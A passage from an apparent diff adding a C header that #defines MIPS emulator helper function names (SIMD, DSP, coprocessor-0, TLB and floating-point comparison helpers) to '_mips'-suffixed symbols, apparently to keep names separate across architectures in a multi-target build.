helper_msa_frsqrt_df_mips +#define helper_msa_frcp_df helper_msa_frcp_df_mips +#define helper_msa_frint_df helper_msa_frint_df_mips +#define helper_msa_flog2_df helper_msa_flog2_df_mips +#define helper_msa_fexupl_df helper_msa_fexupl_df_mips +#define helper_msa_fexupr_df helper_msa_fexupr_df_mips +#define helper_msa_ffql_df helper_msa_ffql_df_mips +#define helper_msa_ffqr_df helper_msa_ffqr_df_mips +#define helper_msa_ftint_s_df helper_msa_ftint_s_df_mips +#define helper_msa_ftint_u_df helper_msa_ftint_u_df_mips +#define helper_msa_ffint_s_df helper_msa_ffint_s_df_mips +#define helper_msa_ffint_u_df helper_msa_ffint_u_df_mips +#define helper_paddsb helper_paddsb_mips +#define helper_paddusb helper_paddusb_mips +#define helper_paddsh helper_paddsh_mips +#define helper_paddush helper_paddush_mips +#define helper_paddb helper_paddb_mips +#define helper_paddh helper_paddh_mips +#define helper_paddw helper_paddw_mips +#define helper_psubsb helper_psubsb_mips +#define helper_psubusb helper_psubusb_mips +#define helper_psubsh helper_psubsh_mips +#define helper_psubush helper_psubush_mips +#define helper_psubb helper_psubb_mips +#define helper_psubh helper_psubh_mips +#define helper_psubw helper_psubw_mips +#define helper_pshufh helper_pshufh_mips +#define helper_packsswh helper_packsswh_mips +#define helper_packsshb helper_packsshb_mips +#define helper_packushb helper_packushb_mips +#define helper_punpcklwd helper_punpcklwd_mips +#define helper_punpckhwd helper_punpckhwd_mips +#define helper_punpcklhw helper_punpcklhw_mips +#define helper_punpckhhw helper_punpckhhw_mips +#define helper_punpcklbh helper_punpcklbh_mips +#define helper_punpckhbh helper_punpckhbh_mips +#define helper_pavgh helper_pavgh_mips +#define helper_pavgb helper_pavgb_mips +#define helper_pmaxsh helper_pmaxsh_mips +#define helper_pminsh helper_pminsh_mips +#define helper_pmaxub helper_pmaxub_mips +#define helper_pminub helper_pminub_mips +#define helper_pcmpeqw helper_pcmpeqw_mips +#define 
helper_pcmpgtw helper_pcmpgtw_mips +#define helper_pcmpeqh helper_pcmpeqh_mips +#define helper_pcmpgth helper_pcmpgth_mips +#define helper_pcmpeqb helper_pcmpeqb_mips +#define helper_pcmpgtb helper_pcmpgtb_mips +#define helper_psllw helper_psllw_mips +#define helper_psrlw helper_psrlw_mips +#define helper_psraw helper_psraw_mips +#define helper_psllh helper_psllh_mips +#define helper_psrlh helper_psrlh_mips +#define helper_psrah helper_psrah_mips +#define helper_pmullh helper_pmullh_mips +#define helper_pmulhh helper_pmulhh_mips +#define helper_pmulhuh helper_pmulhuh_mips +#define helper_pmaddhw helper_pmaddhw_mips +#define helper_pasubub helper_pasubub_mips +#define helper_biadd helper_biadd_mips +#define helper_pmovmskb helper_pmovmskb_mips +#define helper_absq_s_ph helper_absq_s_ph_mips +#define helper_absq_s_qb helper_absq_s_qb_mips +#define helper_absq_s_w helper_absq_s_w_mips +#define helper_addqh_ph helper_addqh_ph_mips +#define helper_addqh_r_ph helper_addqh_r_ph_mips +#define helper_addqh_r_w helper_addqh_r_w_mips +#define helper_addqh_w helper_addqh_w_mips +#define helper_adduh_qb helper_adduh_qb_mips +#define helper_adduh_r_qb helper_adduh_r_qb_mips +#define helper_subqh_ph helper_subqh_ph_mips +#define helper_subqh_r_ph helper_subqh_r_ph_mips +#define helper_subqh_r_w helper_subqh_r_w_mips +#define helper_subqh_w helper_subqh_w_mips +#define helper_addq_ph helper_addq_ph_mips +#define helper_addq_s_ph helper_addq_s_ph_mips +#define helper_addq_s_w helper_addq_s_w_mips +#define helper_addu_ph helper_addu_ph_mips +#define helper_addu_qb helper_addu_qb_mips +#define helper_addu_s_ph helper_addu_s_ph_mips +#define helper_addu_s_qb helper_addu_s_qb_mips +#define helper_subq_ph helper_subq_ph_mips +#define helper_subq_s_ph helper_subq_s_ph_mips +#define helper_subq_s_w helper_subq_s_w_mips +#define helper_subu_ph helper_subu_ph_mips +#define helper_subu_qb helper_subu_qb_mips +#define helper_subu_s_ph helper_subu_s_ph_mips +#define helper_subu_s_qb 
helper_subu_s_qb_mips +#define helper_subuh_qb helper_subuh_qb_mips +#define helper_subuh_r_qb helper_subuh_r_qb_mips +#define helper_addsc helper_addsc_mips +#define helper_addwc helper_addwc_mips +#define helper_modsub helper_modsub_mips +#define helper_raddu_w_qb helper_raddu_w_qb_mips +#define helper_precr_qb_ph helper_precr_qb_ph_mips +#define helper_precrq_qb_ph helper_precrq_qb_ph_mips +#define helper_precr_sra_ph_w helper_precr_sra_ph_w_mips +#define helper_precr_sra_r_ph_w helper_precr_sra_r_ph_w_mips +#define helper_precrq_ph_w helper_precrq_ph_w_mips +#define helper_precrq_rs_ph_w helper_precrq_rs_ph_w_mips +#define helper_precrqu_s_qb_ph helper_precrqu_s_qb_ph_mips +#define helper_precequ_ph_qbl helper_precequ_ph_qbl_mips +#define helper_precequ_ph_qbr helper_precequ_ph_qbr_mips +#define helper_precequ_ph_qbla helper_precequ_ph_qbla_mips +#define helper_precequ_ph_qbra helper_precequ_ph_qbra_mips +#define helper_preceu_ph_qbl helper_preceu_ph_qbl_mips +#define helper_preceu_ph_qbr helper_preceu_ph_qbr_mips +#define helper_preceu_ph_qbla helper_preceu_ph_qbla_mips +#define helper_preceu_ph_qbra helper_preceu_ph_qbra_mips +#define helper_shll_qb helper_shll_qb_mips +#define helper_shrl_qb helper_shrl_qb_mips +#define helper_shra_qb helper_shra_qb_mips +#define helper_shra_r_qb helper_shra_r_qb_mips +#define helper_shll_ph helper_shll_ph_mips +#define helper_shll_s_ph helper_shll_s_ph_mips +#define helper_shll_s_w helper_shll_s_w_mips +#define helper_shra_r_w helper_shra_r_w_mips +#define helper_shrl_ph helper_shrl_ph_mips +#define helper_shra_ph helper_shra_ph_mips +#define helper_shra_r_ph helper_shra_r_ph_mips +#define helper_muleu_s_ph_qbl helper_muleu_s_ph_qbl_mips +#define helper_muleu_s_ph_qbr helper_muleu_s_ph_qbr_mips +#define helper_mulq_rs_ph helper_mulq_rs_ph_mips +#define helper_mul_ph helper_mul_ph_mips +#define helper_mul_s_ph helper_mul_s_ph_mips +#define helper_mulq_s_ph helper_mulq_s_ph_mips +#define helper_muleq_s_w_phl 
helper_muleq_s_w_phl_mips +#define helper_muleq_s_w_phr helper_muleq_s_w_phr_mips +#define helper_mulsaq_s_w_ph helper_mulsaq_s_w_ph_mips +#define helper_mulsa_w_ph helper_mulsa_w_ph_mips +#define helper_dpau_h_qbl helper_dpau_h_qbl_mips +#define helper_dpau_h_qbr helper_dpau_h_qbr_mips +#define helper_dpsu_h_qbl helper_dpsu_h_qbl_mips +#define helper_dpsu_h_qbr helper_dpsu_h_qbr_mips +#define helper_dpa_w_ph helper_dpa_w_ph_mips +#define helper_dpax_w_ph helper_dpax_w_ph_mips +#define helper_dps_w_ph helper_dps_w_ph_mips +#define helper_dpsx_w_ph helper_dpsx_w_ph_mips +#define helper_dpaq_s_w_ph helper_dpaq_s_w_ph_mips +#define helper_dpaqx_s_w_ph helper_dpaqx_s_w_ph_mips +#define helper_dpsq_s_w_ph helper_dpsq_s_w_ph_mips +#define helper_dpsqx_s_w_ph helper_dpsqx_s_w_ph_mips +#define helper_dpaqx_sa_w_ph helper_dpaqx_sa_w_ph_mips +#define helper_dpsqx_sa_w_ph helper_dpsqx_sa_w_ph_mips +#define helper_dpaq_sa_l_w helper_dpaq_sa_l_w_mips +#define helper_dpsq_sa_l_w helper_dpsq_sa_l_w_mips +#define helper_maq_s_w_phl helper_maq_s_w_phl_mips +#define helper_maq_s_w_phr helper_maq_s_w_phr_mips +#define helper_maq_sa_w_phl helper_maq_sa_w_phl_mips +#define helper_maq_sa_w_phr helper_maq_sa_w_phr_mips +#define helper_mulq_s_w helper_mulq_s_w_mips +#define helper_mulq_rs_w helper_mulq_rs_w_mips +#define helper_bitrev helper_bitrev_mips +#define helper_insv helper_insv_mips +#define helper_cmpgu_eq_qb helper_cmpgu_eq_qb_mips +#define helper_cmpgu_lt_qb helper_cmpgu_lt_qb_mips +#define helper_cmpgu_le_qb helper_cmpgu_le_qb_mips +#define helper_cmpu_eq_qb helper_cmpu_eq_qb_mips +#define helper_cmpu_lt_qb helper_cmpu_lt_qb_mips +#define helper_cmpu_le_qb helper_cmpu_le_qb_mips +#define helper_cmp_eq_ph helper_cmp_eq_ph_mips +#define helper_cmp_lt_ph helper_cmp_lt_ph_mips +#define helper_cmp_le_ph helper_cmp_le_ph_mips +#define helper_pick_qb helper_pick_qb_mips +#define helper_pick_ph helper_pick_ph_mips +#define helper_packrl_ph helper_packrl_ph_mips +#define helper_extr_w 
helper_extr_w_mips +#define helper_extr_r_w helper_extr_r_w_mips +#define helper_extr_rs_w helper_extr_rs_w_mips +#define helper_extr_s_h helper_extr_s_h_mips +#define helper_extp helper_extp_mips +#define helper_extpdp helper_extpdp_mips +#define helper_shilo helper_shilo_mips +#define helper_mthlip helper_mthlip_mips +#define cpu_wrdsp cpu_wrdsp_mips +#define helper_wrdsp helper_wrdsp_mips +#define cpu_rddsp cpu_rddsp_mips +#define helper_rddsp helper_rddsp_mips +#define helper_raise_exception_err helper_raise_exception_err_mips +#define helper_clo helper_clo_mips +#define helper_clz helper_clz_mips +#define helper_muls helper_muls_mips +#define helper_mulsu helper_mulsu_mips +#define helper_macc helper_macc_mips +#define helper_macchi helper_macchi_mips +#define helper_maccu helper_maccu_mips +#define helper_macchiu helper_macchiu_mips +#define helper_msac helper_msac_mips +#define helper_msachi helper_msachi_mips +#define helper_msacu helper_msacu_mips +#define helper_msachiu helper_msachiu_mips +#define helper_mulhi helper_mulhi_mips +#define helper_mulhiu helper_mulhiu_mips +#define helper_mulshi helper_mulshi_mips +#define helper_mulshiu helper_mulshiu_mips +#define helper_bitswap helper_bitswap_mips +#define helper_ll helper_ll_mips +#define helper_sc helper_sc_mips +#define helper_swl helper_swl_mips +#define helper_swr helper_swr_mips +#define helper_lwm helper_lwm_mips +#define helper_swm helper_swm_mips +#define helper_mfc0_mvpcontrol helper_mfc0_mvpcontrol_mips +#define helper_mfc0_mvpconf0 helper_mfc0_mvpconf0_mips +#define helper_mfc0_mvpconf1 helper_mfc0_mvpconf1_mips +#define helper_mfc0_random helper_mfc0_random_mips +#define helper_mfc0_tcstatus helper_mfc0_tcstatus_mips +#define helper_mftc0_tcstatus helper_mftc0_tcstatus_mips +#define helper_mfc0_tcbind helper_mfc0_tcbind_mips +#define helper_mftc0_tcbind helper_mftc0_tcbind_mips +#define helper_mfc0_tcrestart helper_mfc0_tcrestart_mips +#define helper_mftc0_tcrestart 
helper_mftc0_tcrestart_mips +#define helper_mfc0_tchalt helper_mfc0_tchalt_mips +#define helper_mftc0_tchalt helper_mftc0_tchalt_mips +#define helper_mfc0_tccontext helper_mfc0_tccontext_mips +#define helper_mftc0_tccontext helper_mftc0_tccontext_mips +#define helper_mfc0_tcschedule helper_mfc0_tcschedule_mips +#define helper_mftc0_tcschedule helper_mftc0_tcschedule_mips +#define helper_mfc0_tcschefback helper_mfc0_tcschefback_mips +#define helper_mftc0_tcschefback helper_mftc0_tcschefback_mips +#define helper_mfc0_count helper_mfc0_count_mips +#define helper_mftc0_entryhi helper_mftc0_entryhi_mips +#define helper_mftc0_cause helper_mftc0_cause_mips +#define helper_mftc0_status helper_mftc0_status_mips +#define helper_mfc0_lladdr helper_mfc0_lladdr_mips +#define helper_mfc0_watchlo helper_mfc0_watchlo_mips +#define helper_mfc0_watchhi helper_mfc0_watchhi_mips +#define helper_mfc0_debug helper_mfc0_debug_mips +#define helper_mftc0_debug helper_mftc0_debug_mips +#define helper_mtc0_index helper_mtc0_index_mips +#define helper_mtc0_mvpcontrol helper_mtc0_mvpcontrol_mips +#define helper_mtc0_vpecontrol helper_mtc0_vpecontrol_mips +#define helper_mttc0_vpecontrol helper_mttc0_vpecontrol_mips +#define helper_mftc0_vpecontrol helper_mftc0_vpecontrol_mips +#define helper_mftc0_vpeconf0 helper_mftc0_vpeconf0_mips +#define helper_mtc0_vpeconf0 helper_mtc0_vpeconf0_mips +#define helper_mttc0_vpeconf0 helper_mttc0_vpeconf0_mips +#define helper_mtc0_vpeconf1 helper_mtc0_vpeconf1_mips +#define helper_mtc0_yqmask helper_mtc0_yqmask_mips +#define helper_mtc0_vpeopt helper_mtc0_vpeopt_mips +#define helper_mtc0_entrylo0 helper_mtc0_entrylo0_mips +#define helper_mtc0_tcstatus helper_mtc0_tcstatus_mips +#define helper_mttc0_tcstatus helper_mttc0_tcstatus_mips +#define helper_mtc0_tcbind helper_mtc0_tcbind_mips +#define helper_mttc0_tcbind helper_mttc0_tcbind_mips +#define helper_mtc0_tcrestart helper_mtc0_tcrestart_mips +#define helper_mttc0_tcrestart helper_mttc0_tcrestart_mips 
+#define helper_mtc0_tchalt helper_mtc0_tchalt_mips +#define helper_mttc0_tchalt helper_mttc0_tchalt_mips +#define helper_mtc0_tccontext helper_mtc0_tccontext_mips +#define helper_mttc0_tccontext helper_mttc0_tccontext_mips +#define helper_mtc0_tcschedule helper_mtc0_tcschedule_mips +#define helper_mttc0_tcschedule helper_mttc0_tcschedule_mips +#define helper_mtc0_tcschefback helper_mtc0_tcschefback_mips +#define helper_mttc0_tcschefback helper_mttc0_tcschefback_mips +#define helper_mtc0_entrylo1 helper_mtc0_entrylo1_mips +#define helper_mtc0_context helper_mtc0_context_mips +#define helper_mtc0_pagemask helper_mtc0_pagemask_mips +#define helper_mtc0_pagegrain helper_mtc0_pagegrain_mips +#define helper_mtc0_wired helper_mtc0_wired_mips +#define helper_mtc0_srsconf0 helper_mtc0_srsconf0_mips +#define helper_mtc0_srsconf1 helper_mtc0_srsconf1_mips +#define helper_mtc0_srsconf2 helper_mtc0_srsconf2_mips +#define helper_mtc0_srsconf3 helper_mtc0_srsconf3_mips +#define helper_mtc0_srsconf4 helper_mtc0_srsconf4_mips +#define helper_mtc0_hwrena helper_mtc0_hwrena_mips +#define helper_mtc0_count helper_mtc0_count_mips +#define helper_mtc0_entryhi helper_mtc0_entryhi_mips +#define helper_mttc0_entryhi helper_mttc0_entryhi_mips +#define helper_mtc0_compare helper_mtc0_compare_mips +#define helper_mtc0_status helper_mtc0_status_mips +#define helper_mttc0_status helper_mttc0_status_mips +#define helper_mtc0_intctl helper_mtc0_intctl_mips +#define helper_mtc0_srsctl helper_mtc0_srsctl_mips +#define helper_mtc0_cause helper_mtc0_cause_mips +#define helper_mttc0_cause helper_mttc0_cause_mips +#define helper_mftc0_epc helper_mftc0_epc_mips +#define helper_mftc0_ebase helper_mftc0_ebase_mips +#define helper_mtc0_ebase helper_mtc0_ebase_mips +#define helper_mttc0_ebase helper_mttc0_ebase_mips +#define helper_mftc0_configx helper_mftc0_configx_mips +#define helper_mtc0_config0 helper_mtc0_config0_mips +#define helper_mtc0_config2 helper_mtc0_config2_mips +#define helper_mtc0_config4 
helper_mtc0_config4_mips +#define helper_mtc0_config5 helper_mtc0_config5_mips +#define helper_mtc0_lladdr helper_mtc0_lladdr_mips +#define helper_mtc0_watchlo helper_mtc0_watchlo_mips +#define helper_mtc0_watchhi helper_mtc0_watchhi_mips +#define helper_mtc0_xcontext helper_mtc0_xcontext_mips +#define helper_mtc0_framemask helper_mtc0_framemask_mips +#define helper_mtc0_debug helper_mtc0_debug_mips +#define helper_mttc0_debug helper_mttc0_debug_mips +#define helper_mtc0_performance0 helper_mtc0_performance0_mips +#define helper_mtc0_taglo helper_mtc0_taglo_mips +#define helper_mtc0_datalo helper_mtc0_datalo_mips +#define helper_mtc0_taghi helper_mtc0_taghi_mips +#define helper_mtc0_datahi helper_mtc0_datahi_mips +#define helper_mftgpr helper_mftgpr_mips +#define helper_mftlo helper_mftlo_mips +#define helper_mfthi helper_mfthi_mips +#define helper_mftacx helper_mftacx_mips +#define helper_mftdsp helper_mftdsp_mips +#define helper_mttgpr helper_mttgpr_mips +#define helper_mttlo helper_mttlo_mips +#define helper_mtthi helper_mtthi_mips +#define helper_mttacx helper_mttacx_mips +#define helper_mttdsp helper_mttdsp_mips +#define helper_dmt helper_dmt_mips +#define helper_emt helper_emt_mips +#define helper_dvpe helper_dvpe_mips +#define helper_evpe helper_evpe_mips +#define helper_fork helper_fork_mips +#define helper_yield helper_yield_mips +#define r4k_helper_tlbinv r4k_helper_tlbinv_mips +#define r4k_helper_tlbinvf r4k_helper_tlbinvf_mips +#define r4k_helper_tlbwi r4k_helper_tlbwi_mips +#define r4k_helper_tlbwr r4k_helper_tlbwr_mips +#define r4k_helper_tlbp r4k_helper_tlbp_mips +#define r4k_helper_tlbr r4k_helper_tlbr_mips +#define helper_tlbwi helper_tlbwi_mips +#define helper_tlbwr helper_tlbwr_mips +#define helper_tlbp helper_tlbp_mips +#define helper_tlbr helper_tlbr_mips +#define helper_tlbinv helper_tlbinv_mips +#define helper_tlbinvf helper_tlbinvf_mips +#define helper_di helper_di_mips +#define helper_ei helper_ei_mips +#define helper_eret helper_eret_mips 
+#define helper_deret helper_deret_mips +#define helper_rdhwr_cpunum helper_rdhwr_cpunum_mips +#define helper_rdhwr_synci_step helper_rdhwr_synci_step_mips +#define helper_rdhwr_cc helper_rdhwr_cc_mips +#define helper_rdhwr_ccres helper_rdhwr_ccres_mips +#define helper_pmon helper_pmon_mips +#define helper_wait helper_wait_mips +#define mips_cpu_do_unaligned_access mips_cpu_do_unaligned_access_mips +#define mips_cpu_unassigned_access mips_cpu_unassigned_access_mips +#define ieee_rm ieee_rm_mips +#define helper_cfc1 helper_cfc1_mips +#define helper_ctc1 helper_ctc1_mips +#define ieee_ex_to_mips ieee_ex_to_mips_mips +#define helper_float_sqrt_d helper_float_sqrt_d_mips +#define helper_float_sqrt_s helper_float_sqrt_s_mips +#define helper_float_cvtd_s helper_float_cvtd_s_mips +#define helper_float_cvtd_w helper_float_cvtd_w_mips +#define helper_float_cvtd_l helper_float_cvtd_l_mips +#define helper_float_cvtl_d helper_float_cvtl_d_mips +#define helper_float_cvtl_s helper_float_cvtl_s_mips +#define helper_float_cvtps_pw helper_float_cvtps_pw_mips +#define helper_float_cvtpw_ps helper_float_cvtpw_ps_mips +#define helper_float_cvts_d helper_float_cvts_d_mips +#define helper_float_cvts_w helper_float_cvts_w_mips +#define helper_float_cvts_l helper_float_cvts_l_mips +#define helper_float_cvts_pl helper_float_cvts_pl_mips +#define helper_float_cvts_pu helper_float_cvts_pu_mips +#define helper_float_cvtw_s helper_float_cvtw_s_mips +#define helper_float_cvtw_d helper_float_cvtw_d_mips +#define helper_float_roundl_d helper_float_roundl_d_mips +#define helper_float_roundl_s helper_float_roundl_s_mips +#define helper_float_roundw_d helper_float_roundw_d_mips +#define helper_float_roundw_s helper_float_roundw_s_mips +#define helper_float_truncl_d helper_float_truncl_d_mips +#define helper_float_truncl_s helper_float_truncl_s_mips +#define helper_float_truncw_d helper_float_truncw_d_mips +#define helper_float_truncw_s helper_float_truncw_s_mips +#define helper_float_ceill_d 
helper_float_ceill_d_mips +#define helper_float_ceill_s helper_float_ceill_s_mips +#define helper_float_ceilw_d helper_float_ceilw_d_mips +#define helper_float_ceilw_s helper_float_ceilw_s_mips +#define helper_float_floorl_d helper_float_floorl_d_mips +#define helper_float_floorl_s helper_float_floorl_s_mips +#define helper_float_floorw_d helper_float_floorw_d_mips +#define helper_float_floorw_s helper_float_floorw_s_mips +#define helper_float_abs_d helper_float_abs_d_mips +#define helper_float_abs_s helper_float_abs_s_mips +#define helper_float_abs_ps helper_float_abs_ps_mips +#define helper_float_chs_d helper_float_chs_d_mips +#define helper_float_chs_s helper_float_chs_s_mips +#define helper_float_chs_ps helper_float_chs_ps_mips +#define helper_float_maddf_s helper_float_maddf_s_mips +#define helper_float_maddf_d helper_float_maddf_d_mips +#define helper_float_msubf_s helper_float_msubf_s_mips +#define helper_float_msubf_d helper_float_msubf_d_mips +#define helper_float_max_s helper_float_max_s_mips +#define helper_float_max_d helper_float_max_d_mips +#define helper_float_maxa_s helper_float_maxa_s_mips +#define helper_float_maxa_d helper_float_maxa_d_mips +#define helper_float_min_s helper_float_min_s_mips +#define helper_float_min_d helper_float_min_d_mips +#define helper_float_mina_s helper_float_mina_s_mips +#define helper_float_mina_d helper_float_mina_d_mips +#define helper_float_rint_s helper_float_rint_s_mips +#define helper_float_rint_d helper_float_rint_d_mips +#define helper_float_class_s helper_float_class_s_mips +#define helper_float_class_d helper_float_class_d_mips +#define helper_float_recip_d helper_float_recip_d_mips +#define helper_float_recip_s helper_float_recip_s_mips +#define helper_float_rsqrt_d helper_float_rsqrt_d_mips +#define helper_float_rsqrt_s helper_float_rsqrt_s_mips +#define helper_float_recip1_d helper_float_recip1_d_mips +#define helper_float_recip1_s helper_float_recip1_s_mips +#define helper_float_recip1_ps 
helper_float_recip1_ps_mips +#define helper_float_rsqrt1_d helper_float_rsqrt1_d_mips +#define helper_float_rsqrt1_s helper_float_rsqrt1_s_mips +#define helper_float_rsqrt1_ps helper_float_rsqrt1_ps_mips +#define helper_float_add_d helper_float_add_d_mips +#define helper_float_add_s helper_float_add_s_mips +#define helper_float_add_ps helper_float_add_ps_mips +#define helper_float_sub_d helper_float_sub_d_mips +#define helper_float_sub_s helper_float_sub_s_mips +#define helper_float_sub_ps helper_float_sub_ps_mips +#define helper_float_mul_d helper_float_mul_d_mips +#define helper_float_mul_s helper_float_mul_s_mips +#define helper_float_mul_ps helper_float_mul_ps_mips +#define helper_float_div_d helper_float_div_d_mips +#define helper_float_div_s helper_float_div_s_mips +#define helper_float_div_ps helper_float_div_ps_mips +#define helper_float_madd_d helper_float_madd_d_mips +#define helper_float_madd_s helper_float_madd_s_mips +#define helper_float_madd_ps helper_float_madd_ps_mips +#define helper_float_msub_d helper_float_msub_d_mips +#define helper_float_msub_s helper_float_msub_s_mips +#define helper_float_msub_ps helper_float_msub_ps_mips +#define helper_float_nmadd_d helper_float_nmadd_d_mips +#define helper_float_nmadd_s helper_float_nmadd_s_mips +#define helper_float_nmadd_ps helper_float_nmadd_ps_mips +#define helper_float_nmsub_d helper_float_nmsub_d_mips +#define helper_float_nmsub_s helper_float_nmsub_s_mips +#define helper_float_nmsub_ps helper_float_nmsub_ps_mips +#define helper_float_recip2_d helper_float_recip2_d_mips +#define helper_float_recip2_s helper_float_recip2_s_mips +#define helper_float_recip2_ps helper_float_recip2_ps_mips +#define helper_float_rsqrt2_d helper_float_rsqrt2_d_mips +#define helper_float_rsqrt2_s helper_float_rsqrt2_s_mips +#define helper_float_rsqrt2_ps helper_float_rsqrt2_ps_mips +#define helper_float_addr_ps helper_float_addr_ps_mips +#define helper_float_mulr_ps helper_float_mulr_ps_mips +#define helper_cmp_d_f 
helper_cmp_d_f_mips +#define helper_cmpabs_d_f helper_cmpabs_d_f_mips +#define helper_cmp_d_un helper_cmp_d_un_mips +#define helper_cmpabs_d_un helper_cmpabs_d_un_mips +#define helper_cmp_d_eq helper_cmp_d_eq_mips +#define helper_cmpabs_d_eq helper_cmpabs_d_eq_mips +#define helper_cmp_d_ueq helper_cmp_d_ueq_mips +#define helper_cmpabs_d_ueq helper_cmpabs_d_ueq_mips +#define helper_cmp_d_olt helper_cmp_d_olt_mips +#define helper_cmpabs_d_olt helper_cmpabs_d_olt_mips +#define helper_cmp_d_ult helper_cmp_d_ult_mips +#define helper_cmpabs_d_ult helper_cmpabs_d_ult_mips +#define helper_cmp_d_ole helper_cmp_d_ole_mips +#define helper_cmpabs_d_ole helper_cmpabs_d_ole_mips +#define helper_cmp_d_ule helper_cmp_d_ule_mips +#define helper_cmpabs_d_ule helper_cmpabs_d_ule_mips +#define helper_cmp_d_sf helper_cmp_d_sf_mips +#define helper_cmpabs_d_sf helper_cmpabs_d_sf_mips +#define helper_cmp_d_ngle helper_cmp_d_ngle_mips +#define helper_cmpabs_d_ngle helper_cmpabs_d_ngle_mips +#define helper_cmp_d_seq helper_cmp_d_seq_mips +#define helper_cmpabs_d_seq helper_cmpabs_d_seq_mips +#define helper_cmp_d_ngl helper_cmp_d_ngl_mips +#define helper_cmpabs_d_ngl helper_cmpabs_d_ngl_mips +#define helper_cmp_d_lt helper_cmp_d_lt_mips +#define helper_cmpabs_d_lt helper_cmpabs_d_lt_mips +#define helper_cmp_d_nge helper_cmp_d_nge_mips +#define helper_cmpabs_d_nge helper_cmpabs_d_nge_mips +#define helper_cmp_d_le helper_cmp_d_le_mips +#define helper_cmpabs_d_le helper_cmpabs_d_le_mips +#define helper_cmp_d_ngt helper_cmp_d_ngt_mips +#define helper_cmpabs_d_ngt helper_cmpabs_d_ngt_mips +#define helper_cmp_s_f helper_cmp_s_f_mips +#define helper_cmpabs_s_f helper_cmpabs_s_f_mips +#define helper_cmp_s_un helper_cmp_s_un_mips +#define helper_cmpabs_s_un helper_cmpabs_s_un_mips +#define helper_cmp_s_eq helper_cmp_s_eq_mips +#define helper_cmpabs_s_eq helper_cmpabs_s_eq_mips +#define helper_cmp_s_ueq helper_cmp_s_ueq_mips +#define helper_cmpabs_s_ueq helper_cmpabs_s_ueq_mips +#define 
helper_cmp_s_olt helper_cmp_s_olt_mips +#define helper_cmpabs_s_olt helper_cmpabs_s_olt_mips +#define helper_cmp_s_ult helper_cmp_s_ult_mips +#define helper_cmpabs_s_ult helper_cmpabs_s_ult_mips +#define helper_cmp_s_ole helper_cmp_s_ole_mips +#define helper_cmpabs_s_ole helper_cmpabs_s_ole_mips +#define helper_cmp_s_ule helper_cmp_s_ule_mips +#define helper_cmpabs_s_ule helper_cmpabs_s_ule_mips +#define helper_cmp_s_sf helper_cmp_s_sf_mips +#define helper_cmpabs_s_sf helper_cmpabs_s_sf_mips +#define helper_cmp_s_ngle helper_cmp_s_ngle_mips +#define helper_cmpabs_s_ngle helper_cmpabs_s_ngle_mips +#define helper_cmp_s_seq helper_cmp_s_seq_mips +#define helper_cmpabs_s_seq helper_cmpabs_s_seq_mips +#define helper_cmp_s_ngl helper_cmp_s_ngl_mips +#define helper_cmpabs_s_ngl helper_cmpabs_s_ngl_mips +#define helper_cmp_s_lt helper_cmp_s_lt_mips +#define helper_cmpabs_s_lt helper_cmpabs_s_lt_mips +#define helper_cmp_s_nge helper_cmp_s_nge_mips +#define helper_cmpabs_s_nge helper_cmpabs_s_nge_mips +#define helper_cmp_s_le helper_cmp_s_le_mips +#define helper_cmpabs_s_le helper_cmpabs_s_le_mips +#define helper_cmp_s_ngt helper_cmp_s_ngt_mips +#define helper_cmpabs_s_ngt helper_cmpabs_s_ngt_mips +#define helper_cmp_ps_f helper_cmp_ps_f_mips +#define helper_cmpabs_ps_f helper_cmpabs_ps_f_mips +#define helper_cmp_ps_un helper_cmp_ps_un_mips +#define helper_cmpabs_ps_un helper_cmpabs_ps_un_mips +#define helper_cmp_ps_eq helper_cmp_ps_eq_mips +#define helper_cmpabs_ps_eq helper_cmpabs_ps_eq_mips +#define helper_cmp_ps_ueq helper_cmp_ps_ueq_mips +#define helper_cmpabs_ps_ueq helper_cmpabs_ps_ueq_mips +#define helper_cmp_ps_olt helper_cmp_ps_olt_mips +#define helper_cmpabs_ps_olt helper_cmpabs_ps_olt_mips +#define helper_cmp_ps_ult helper_cmp_ps_ult_mips +#define helper_cmpabs_ps_ult helper_cmpabs_ps_ult_mips +#define helper_cmp_ps_ole helper_cmp_ps_ole_mips +#define helper_cmpabs_ps_ole helper_cmpabs_ps_ole_mips +#define helper_cmp_ps_ule helper_cmp_ps_ule_mips +#define 
helper_cmpabs_ps_ule helper_cmpabs_ps_ule_mips +#define helper_cmp_ps_sf helper_cmp_ps_sf_mips +#define helper_cmpabs_ps_sf helper_cmpabs_ps_sf_mips +#define helper_cmp_ps_ngle helper_cmp_ps_ngle_mips +#define helper_cmpabs_ps_ngle helper_cmpabs_ps_ngle_mips +#define helper_cmp_ps_seq helper_cmp_ps_seq_mips +#define helper_cmpabs_ps_seq helper_cmpabs_ps_seq_mips +#define helper_cmp_ps_ngl helper_cmp_ps_ngl_mips +#define helper_cmpabs_ps_ngl helper_cmpabs_ps_ngl_mips +#define helper_cmp_ps_lt helper_cmp_ps_lt_mips +#define helper_cmpabs_ps_lt helper_cmpabs_ps_lt_mips +#define helper_cmp_ps_nge helper_cmp_ps_nge_mips +#define helper_cmpabs_ps_nge helper_cmpabs_ps_nge_mips +#define helper_cmp_ps_le helper_cmp_ps_le_mips +#define helper_cmpabs_ps_le helper_cmpabs_ps_le_mips +#define helper_cmp_ps_ngt helper_cmp_ps_ngt_mips +#define helper_cmpabs_ps_ngt helper_cmpabs_ps_ngt_mips +#define helper_r6_cmp_d_af helper_r6_cmp_d_af_mips +#define helper_r6_cmp_d_un helper_r6_cmp_d_un_mips +#define helper_r6_cmp_d_eq helper_r6_cmp_d_eq_mips +#define helper_r6_cmp_d_ueq helper_r6_cmp_d_ueq_mips +#define helper_r6_cmp_d_lt helper_r6_cmp_d_lt_mips +#define helper_r6_cmp_d_ult helper_r6_cmp_d_ult_mips +#define helper_r6_cmp_d_le helper_r6_cmp_d_le_mips +#define helper_r6_cmp_d_ule helper_r6_cmp_d_ule_mips +#define helper_r6_cmp_d_saf helper_r6_cmp_d_saf_mips +#define helper_r6_cmp_d_sun helper_r6_cmp_d_sun_mips +#define helper_r6_cmp_d_seq helper_r6_cmp_d_seq_mips +#define helper_r6_cmp_d_sueq helper_r6_cmp_d_sueq_mips +#define helper_r6_cmp_d_slt helper_r6_cmp_d_slt_mips +#define helper_r6_cmp_d_sult helper_r6_cmp_d_sult_mips +#define helper_r6_cmp_d_sle helper_r6_cmp_d_sle_mips +#define helper_r6_cmp_d_sule helper_r6_cmp_d_sule_mips +#define helper_r6_cmp_d_or helper_r6_cmp_d_or_mips +#define helper_r6_cmp_d_une helper_r6_cmp_d_une_mips +#define helper_r6_cmp_d_ne helper_r6_cmp_d_ne_mips +#define helper_r6_cmp_d_sor 